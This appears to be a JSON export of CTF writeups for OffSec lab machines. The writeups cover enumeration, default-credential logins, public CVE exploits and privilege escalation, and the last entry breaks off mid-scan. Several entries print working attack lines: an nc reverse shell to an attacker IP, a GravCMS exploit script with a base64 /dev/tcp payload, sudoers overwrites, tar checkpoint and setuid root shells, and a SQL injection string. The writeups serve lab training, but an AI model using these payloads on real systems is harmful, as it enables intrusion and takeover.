Nmap done: 1 IP address (1 host up) scanned in 17.70 seconds Dirbusting # Port 3000 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Let's search up Ruby 3.0.2.\nWe found this exploit; on copying and running the payload after URL-encoding it, we get our shell.\n","date":"22 March 2026","externalUrl":null,"permalink":"/ctf-writeups/rubydome/","section":"CTF Writeups","summary":"","title":"RubyDome","type":"ctf-writeups"},{"content":" Press # Overview # OS: Linux IP: 192.168.126.29 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with default creds and a magic-byte file upload bypass; privesc with GTFOBins.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: Lugx Gaming Shop HTML5 Template |_http-server-header: Apache/2.4.56 (Debian) 8089/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-server-header: Apache/2.4.56 (Debian) |_http-generator: FlatPress fp-1.2.1 |_http-title: FlatPress Device type: general purpose Running: Linux 5.X Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\n8089 # I validated this step using the evidence below before moving forward in the chain.\nExploitation # I have a strong feeling this is the intended path, so let's try bruteforcing the creds.\nAfter trying the default creds admin:password, we are in.\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\n","date":"21 March 
2026","externalUrl":null,"permalink":"/ctf-writeups/press/","section":"CTF Writeups","summary":"","title":"Press","type":"ctf-writeups"},{"content":" Scrutiny # Overview # OS: Linux IP: 192.168.126.91 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and then privesc with mail and exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Nmap was my starting point here, and the service/version clues below shaped the next checks.\nLet's add onlyrands.com to our hosts.\nDirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nAdd this to our hosts as well.\nGreat, I think we can try getting in from here; let's check.\nExploitation # https://github.com/joshuavanderpoll/cve-2024-56348\nI found a 0xdf post telling us to enable debug first, so let's do that.\nexport TOKEN=\u0026#34;\u0026lt;TOKEN HERE\u0026gt;\u0026#34; Checking around the website because that failed,\nwe find this.\nWe got mail.\n","date":"21 March 2026","externalUrl":null,"permalink":"/ctf-writeups/scrutiny/","section":"CTF Writeups","summary":"","title":"Scrutiny","type":"ctf-writeups"},{"content":" Fired # Overview # OS: Linux IP: 192.168.217.96 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # BROKEN.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 51:56:a7:34:16:8e:3d:47:17:c8:96:d5:e6:94:46:46 (RSA) | 256 fe:76:e3:4c:2b:f6:f5:21:a2:4d:9f:59:52:39:b9:16 (ECDSA) |_ 256 2c:dd:62:7d:d6:1c:f4:fd:a1:e4:c8:aa:11:ae:d6:1f (ED25519) 9090/tcp open hadoop-datanode Apache Hadoop | hadoop-datanode-info: |_ Logs: jive-ibtn jive-btn-gradient |_http-title: Site doesn\u0026#39;t have a title (text/html). 
| hadoop-tasktracker-info: |_ Logs: jive-ibtn jive-btn-gradient 9091/tcp open ssl/hadoop-datanode Apache Hadoop |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost | Subject Alternative Name: DNS:localhost, DNS:*.localhost | Not valid before: 2024-06-28T07:02:39 |_Not valid after: 2029-06-27T07:02:39 |_http-title: Site doesn\u0026#39;t have a title (text/html). | hadoop-tasktracker-info: |_ Logs: jive-ibtn jive-btn-gradient | hadoop-datanode-info: |_ Logs: jive-ibtn jive-btn-gradient Dirbusting # Port 80 # Exploitation # Let's use this:\nhttps://github.com/K3ysTr0K3R/CVE-2023-32315-EXPLOIT\nUsing these creds we are in.\nOK, so this lab is broken for me; I'm not able to get past the login page because it gets stuck.\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/fired/","section":"CTF Writeups","summary":"","title":"Fired","type":"ctf-writeups"},{"content":" LaVita # Overview # OS: Linux IP: 192.168.217.38 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for LaVita, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: W3.CSS Template |_http-server-header: Apache/2.4.56 (Debian) Device type: general purpose|router Dirbusting # Port 80 # Exploitation # I came across this\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/lavita/","section":"CTF Writeups","summary":"","title":"LaVita","type":"ctf-writeups"},{"content":" pc # Overview # OS: Linux IP: 192.168.19.50 Difficulty: 
Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Exploited rpc.py.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA) | 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA) |_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519) 8000/tcp open http ttyd 1.7.3-a2312cb (libwebsockets 3.2.0) |_http-title: ttyd - Terminal |_http-server-header: ttyd/1.7.3-a2312cb (libwebsockets/3.2.0) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Exploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nWow, let's just spawn a rev shell with nc and see where that takes us.\nOK, I can work better now.\nPrivESC # Nothing interesting, but we found this in rpc.py:\nser@pc:/opt$ cat rpc.py cat rpc.py from typing import AsyncGenerator from typing_extensions import TypedDict import uvicorn from rpcpy import RPC app = RPC(mode=\u0026#34;ASGI\u0026#34;) @app.register async def none() -\u0026gt; None: return @app.register async def sayhi(name: str) -\u0026gt; str: return f\u0026#34;hi {name}\u0026#34; @app.register async def yield_data(max_num: int) -\u0026gt; AsyncGenerator[int, None]: for i in range(max_num): yield i D = TypedDict(\u0026#34;D\u0026#34;, {\u0026#34;key\u0026#34;: str, \u0026#34;other-key\u0026#34;: str}) @app.register async def query_dict(value: str) -\u0026gt; D: return {\u0026#34;key\u0026#34;: value, \u0026#34;other-key\u0026#34;: value} if __name__ == 
\u0026#34;__main__\u0026#34;: uvicorn.run(app, interface=\u0026#34;asgi3\u0026#34;, port=65432 Let's check if there is any exploit for this.\nexec_command(‘echo “user ALL=(root) NOPASSWD: ALL” \u0026gt; /etc/sudoers’)\nAnd boom.\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pc/","section":"CTF Writeups","summary":"","title":"pc","type":"ctf-writeups"},{"content":" law # Overview # OS: Linux IP: 192.168.102.190 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE with modification + privesc with cron.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # OK, so none of the exploits were working for some reason, so I decided to pull out Burp and give it a go manually.\nChanging the redirect to / seemed to have fixed it for me, since that PHP page didn't really exist.\nnc -e /bin/sh 192.168.45.159 9001\nAnd boom, we have our reverse shell.\n","date":"19 March 2026","externalUrl":null,"permalink":"/ctf-writeups/law/","section":"CTF Writeups","summary":"","title":"law","type":"ctf-writeups"},{"content":" Crane # Overview # OS: Linux IP: 192.168.192.146 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Easy admin:admin and exploit RCE; privesc with sudo -l.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nadmin:admin just let us in, lol.\nFound this CVE for it.\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\nInteresting.\nAnd GTFOBins had one for this. Boom.\n","date":"17 
March 2026","externalUrl":null,"permalink":"/ctf-writeups/crane/","section":"CTF Writeups","summary":"","title":"Crane","type":"ctf-writeups"},{"content":" Extplorer # Overview # OS: Linux IP: 192.168.192.27 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy php shell esc privs with exposed pass in config and disk perm for privesc.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 80 # Exploitation # file manager takes us here\nso simple\nif( !defined( \u0026#39;_JEXEC\u0026#39; ) \u0026amp;\u0026amp; !defined( \u0026#39;_VALID_MOS\u0026#39; ) ) die( \u0026#39;Restricted access\u0026#39; ); $GLOBALS[\u0026#34;users\u0026#34;]=array( array(\u0026#39;admin\u0026#39;,\u0026#39;21232f297a57a5a743894a0e4a801fc3\u0026#39;,\u0026#39;/var/www/html\u0026#39;,\u0026#39;http://localhost\u0026#39;,\u0026#39;1\u0026#39;,\u0026#39;\u0026#39;,\u0026#39;7\u0026#39;,1), array(\u0026#39;dora\u0026#39;,\u0026#39;$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS\u0026#39;,\u0026#39;/var/www/html\u0026#39;,\u0026#39;http://localhost\u0026#39;,\u0026#39;1\u0026#39;,\u0026#39;\u0026#39;,\u0026#39;0\u0026#39;,1), lets try cracking first, if that doesnt work then lets msql\nwell that was quick\nlets su\nthat worked, now lets run linpeas\nlets try this cuz we have disk priv\nhttps://www.hackingarticles.in/disk-group-privilege-escalation/\nwe only have read perms hmm\ncracking this gave us the 
pass as explorer\neasy\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/extplorer/","section":"CTF Writeups","summary":"","title":"Extplorer","type":"ctf-writeups"},{"content":" Hub # Overview # OS: Linux IP: 192.168.105.25 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # It was just a simple exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http nginx 1.18.0 |_http-title: 403 Forbidden |_http-server-header: nginx/1.18.0 6309/tcp filtered unknown 6840/tcp filtered unknown 8082/tcp open http Barracuda Embedded Web Server |_http-title: Home |_http-server-header: BarracudaServer.com (Posix) | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK | http-webdav-scan: | Server Type: BarracudaServer.com (Posix) | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK | Server Date: Tue, 17 Mar 2026 13:47:25 GMT |_ WebDAV type: Unknown 9999/tcp open ssl/http Barracuda Embedded Web Server | ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost | Not valid before: 2019-07-16T19:15:09 |_Not valid after: 2074-04-18T19:15:09 | http-webdav-scan: | Server Type: BarracudaServer.com (Posix) | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK | Server Date: Tue, 17 Mar 2026 13:47:25 GMT |_ WebDAV type: Unknown |_http-server-header: BarracudaServer.com (Posix) |_http-title: 
Home | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK 10477/tcp filtered unknown Dirbusting # Port 8082 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # we set the admin account as admin:admin1234\nhttps://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697\nnow clicking on about gives us a shell\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/hub/","section":"CTF Writeups","summary":"","title":"Hub","type":"ctf-writeups"},{"content":" Levram # Overview # OS: Linux IP: 192.168.192.24:8000 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # exploit RCE default admin admin —\u0026gt; privesc with cap.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 8000/tcp open http WSGIServer 0.2 (Python 3.10.6) |_http-cors: GET POST PUT DELETE OPTIONS PATCH |_http-title: Gerapy |_http-server-header: WSGIServer/0.2 CPython/3.10.6 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Exploitation # admin admin just gets us in\nusing a poc we found online we are in just like that\nlinpeas showed us that we had cap set\n[sudo] password for app: sudo: 3 incorrect password attempts app@ubuntu:/tmp$ /usr/bin/python3.10 -c \u0026lsquo;import os; os.setuid(0); os.system(\u0026quot;/bin/bash\u0026quot;)\u0026rsquo; \u0026lt;c 
\u0026lsquo;import os; os.setuid(0); os.system(\u0026quot;/bin/bash\u0026quot;)\u0026rsquo; root@ubuntu:/tmp# cat /root/proof.txt cat /root/proof.txt fddf6d6324241b01d6f2eda82dd68640 root@ubuntu:/tmp#\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/levram/","section":"CTF Writeups","summary":"","title":"Levram","type":"ctf-writeups"},{"content":" Codo # Overview # OS: Linux IP: 192.168.192.23 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # default creds on web portal —\u0026gt; file upload —\u0026gt; exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # admin admin default creds worked lmaooo\nwe find this\nhttps://www.exploit-db.com/exploits/50978\nmade some changes here\nand then accessed the payload\nwe just used a simple pentestmonkey rev shell btw\nanyways we are in\nPrivESC # ","date":"16 March 2026","externalUrl":null,"permalink":"/ctf-writeups/codo/","section":"CTF Writeups","summary":"","title":"Codo","type":"ctf-writeups"},{"content":" Clue # Overview # OS: Linux IP: 192.168.205.240 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Clue, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA) |_ 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA) 80/tcp open http Apache httpd 2.4.38 |_http-server-header: Apache/2.4.38 (Debian) |_http-title: 403 Forbidden 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: 
WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 3000/tcp open http Thin httpd |_http-server-header: thin |_http-title: Cassandra Web 8021/tcp open freeswitch-event FreeSWITCH mod_event_socket Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2026-03-15T11:55:55 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: clue | NetBIOS computer name: CLUE\\x00 | Domain name: pg | FQDN: clue.pg |_ System time: 2026-03-15T07:55:56-04:00 | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 86.39 ms 192.168.45.1 2 86.35 ms 192.168.45.254 3 86.45 ms 192.168.251.1 4 86.46 ms 192.168.205.240 OS and Service detection performed. 
Please report any incorrect results at https://nm Dirbusting # Port 80 # CVE-2021-44521\nPort 8021 Free Switch # 8021/tcp open freeswitch-event FreeSWITCH mod_event_socket\nok so the password seems to be different from the default ClueCon\nso I used searchsploit and came across a read file exploit for cassandra web, and guessed this might let us read that config file for the password, and here we are\nlet's move to the exploitation section now\nExploitation # ok so we have the password\nwe can also\nwhich gives us the pass for cassandra as SecondBitetheApple330\nthe password is StrongClueConEight021 great\nand we are in\nI wasn't getting a connect back, BUT ON USING AN OPEN PORT 3000 for cassandra I GOT IT, ALWAYS USE OPEN PORTS GUYS\nlet's try changing our user to cassie\nwget is buuustedddd\nwe are able to su to cassie with the prev creds and\nrun linpeas\nthere is an id sitting here almost as if it was intentionally put there for us to use because it's not supposed to be here by default\nso let's use it for the 2 people that are allowed to access root and anthoyn via ssh\nand boom it worked for root\n","date":"15 March 2026","externalUrl":null,"permalink":"/ctf-writeups/clue/","section":"CTF Writeups","summary":"","title":"Clue","type":"ctf-writeups"},{"content":" Cockpit # Overview # OS: Linux IP: 192.168.205.10 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Cockpit, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ──(kali㉿kali)-[~/Desktop/Boxes/Offsec/cockpit] └─$ nmap 192.168.205.10 -sCV -p- -Pn --min-rate=20000 -A Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 11:28 EDT Nmap scan report for 192.168.205.10 Host is up (0.083s latency). 
Not shown: 65412 closed tcp ports (reset), 120 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: blaze 9090/tcp open http Cockpit web service 198 - 220 |_http-title: Did not follow redirect to https://192.168.205.10:9090/ Device type: general purpose|router Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 9090 # I validated this step using the evidence below before moving forward in the chain.\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # great so we have sqli\nok so when I left the pass field empty and tried this\n' UNION SELECT NULL,NULL,NULL,NULL,NULL--\nwe just got thru\nlooks like b64\njames:canttouchhhthiss@455152 cameron:thisscanttbetouchedd@455152 we were not able to ssh with these creds\non logging in we were able to add ourselves here so that's great\nnow we can ssh in, let's do the same for cameron\nok so only james seems to have worked wow\nok so we are basically archiving backup.tar.gz from *\nlet's just append that command with our one-liner and call it a day\nsudo /usr/bin/tar -czvf /tmp/backup.tar.gz * --checkpoint=1 --checkpoint-action=exec=\u0026quot;/bin/sh\u0026quot;\nanother way would have been abusing the wildcard\necho \u0026#39;cp /bin/bash /tmp/bash; chmod +s /tmp/bash\u0026#39; \u0026gt; /home/james/shell.sh echo \u0026#34;\u0026#34; \u0026gt; \u0026#34;--checkpoint-action=exec=sh shell.sh\u0026#34; echo \u0026#34;\u0026#34; \u0026gt; --checkpoint=1 /tmp/bash -p ","date":"15 March 
2026","externalUrl":null,"permalink":"/ctf-writeups/cockpit/","section":"CTF Writeups","summary":"","title":"Cockpit","type":"ctf-writeups"},{"content":" Astronaut # Overview # OS: Linux IP: 192.168.133.12 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # exploit rce then privesc with suid set.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 | http-ls: Volume / | SIZE TIME FILENAME | - 2021-03-17 17:46 grav-admin/ |_ |_http-title: Index of / |_http-server-header: Apache/2.4.41 (Ubuntu) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 82.07 ms 192.168.45.1 2 82.03 ms 192.168.45.254 3 82.12 ms 192.168.251.1 4 82.16 ms 192.168.133.12 Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nCan't really find the version so let's look up some exploits\nlet's try these ones out\nLet's change accordingly\nExploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) ## Original Exploit Author: Mehmet Ince ## Vendor Homepage: https://getgrav.org ## Version: 1.10.7 ## Tested on: Debian 10 ## Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= \u0026#34;http://192.168.1.2\u0026#34; #Change base64 encoded value with with below command. #echo -ne \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.1.3/4444 0\u0026gt;\u0026amp;1\u0026#34; | base64 -w0 payload=b\u0026#34;\u0026#34;\u0026#34;/*\u0026lt;?php /**/ file_put_contents(\u0026#39;/tmp/rev.sh\u0026#39;,base64_decode(\u0026#39;YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE=\u0026#39;));chmod(\u0026#39;/tmp/rev.sh\u0026#39;,0755);system(\u0026#39;bash /tmp/rev.sh\u0026#39;); \u0026#34;\u0026#34;\u0026#34; s = requests.Session() r = s.get(target+\u0026#34;/admin\u0026#34;) adminNonce = re.search(r\u0026#39;admin-nonce\u0026#34; value=\u0026#34;(.*)\u0026#34;\u0026#39;,r.text).group(1) if adminNonce != \u0026#34;\u0026#34; : url = target + \u0026#34;/admin/tools/scheduler\u0026#34; data = \u0026#34;admin-nonce=\u0026#34;+adminNonce data 
+=\u0026#39;\u0026amp;task=SaveDefault\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22\u0026#39;+base64.b64encode(payload).decode(\u0026#39;utf-8\u0026#39;)+\u0026#39;%22%29%29%3b\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=\u0026amp;data%5bstatus%5d%5bncefs%5d=enabled\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append\u0026#39; headers = {\u0026#39;Content-Type\u0026#39;: \u0026#39;application/x-www-form-urlencoded\u0026#39;} r = s.post(target+\u0026#34;/admin/config/scheduler\u0026#34;,data=data,headers=headers) let's replace with this\nok so I was getting a NoneType error for some reason; read the code and realized why: I was supposed to give the path http://ip/grav-admin and let it append /admin\nanyways we got our initial foothold\nPrivEsc # let's run linpeas and see if we come across anything interesting\nhmm it seems to be\ngo to /var/www/html/grav-admin\nexecute /usr/bin/php bin/grav scheduler 1\u0026gt;\u0026gt; /dev/null 2\u0026gt;\u0026amp;1\nwe could either change the grav file to a revshell and have it execute it if we have perms to edit the grav file,\nor we can spawn like this\nphp -r \u0026#39;system(\u0026quot;/bin/sh -i\u0026quot;);\u0026#39;\nand that gives us the root shell\n","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/astronaut/","section":"CTF Writeups","summary":"","title":"Astronaut","type":"ctf-writeups"},{"content":" BlackGate # Overview # OS: Linux IP: 192.168.133.176 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # redis based rce and privesc with pwnkit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 
